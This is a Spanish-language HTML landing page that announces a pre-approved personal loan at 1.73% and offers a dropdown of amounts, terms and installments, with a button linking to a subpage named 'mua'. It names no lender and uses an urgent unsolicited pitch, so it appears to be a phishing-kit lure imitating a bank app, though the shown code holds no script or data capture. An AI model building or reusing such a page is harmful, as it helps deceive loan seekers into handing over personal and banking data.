<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Solicita tu credito libre inversion y disfrutalo como quieras</title>

    <!-- Linkeado CSS -->
    <link rel="stylesheet" href="./assets/css/styles.css">

  <style>
     *{
    -webkit-appearance: none;
    -webkit-border-radius: 0;
 }
  </style>
</head>
<body>
    <header>
        <div class="header-logo">
            <img src="./assets/img/icons/logo-of.png" alt="...">
        </div>
        <div class="header-op">
            <img src="./assets/img/icons/ico-1.png" alt="...">
            <img src="./assets/img/icons/ico-2.png" alt="...">
            <img src="./assets/img/icons/ico-3.png" alt="...">
        </div>
    </header>
  

    <section>
        <div class="wrapper">
            <p> 
               <center> Cuentas con un credito de <strong>Libre Inversion</strong> pre-aprobado. 
                Aprovecha las ventajas de una cuota fija con tasa de <strong>1,73%</strong> 
                efectivo. Aprovecha esta oportunidad! </center> 
            </p>
            <picture>
                <img src="./assets/img/flyer.png" alt="...">
            </picture>

            <div class="box">
                <div class="box-icon">
                    <img src="./assets/img/icons/ico-1.png" alt="...">
                </div>
                <span>Selecciona el monto, plazo y la cuota</span>

                <select style="color:black; padding-left:50px; ">
                  <option value="$2,000,000-12 meses cuotas $215.959">$2,000,000-12 meses cuota $215.959</option>
                    <option value="$2,000,000-24 meses cuota $138.759">$2,000,000-24 meses cuota $138.759</option>
                    <option value="$2,000,000-36 meses cuota $93.759">$2,000,000-36 meses cuota $93.759</option>
                    <option value="$5,000,000-12 meses cuota $539.899">$5,000,000-12 meses cuota $539.899</option>
                    <option value="$10,000,000-12 meses cuota $1.079.799">$10,000,000-12 meses cuota $1.079.799</option>
                    <option value="$20,000,000-12 meses cuota $2,159,599.78">$20,000,000-12 meses cuota $2,159,599.78</option>
                    <option value="$20,000,000-24 meses cuota $1,387,599.78">$20,000,000-24 meses cuota $1,387,599.78</option>
                    <option value="$20,000,000-36 meses cuota $937,599.78">$20,000,000-36 meses cuota $937,599.78</option>
                    <option value="$20,000,000-48 meses cuota $687,599.78">$20,000,000-48 meses cuota $687,599.78</option>
                    <option value="$20,000,000-60 meses cuota $497,599.78">$20,000,000-60 meses cuota $497,599.78</option>
                </select>

                <div class="box-btn">
                    <button><a href="mua/index.html" style="text-decoration: none; color: black;">Solicitar Prestamo</a></button>
                    
                </div>
            </div>
        </div>
    </section>

    <footer>
        <img src="./assets/img/icons/home.png" alt="...">
        <img src="./assets/img/icons/mov.png" alt="...">
        <img src="./assets/img/icons/exp.png" alt="...">
        <img src="./assets/img/icons/conf.png" alt="...">
    </footer>




</body>
</html>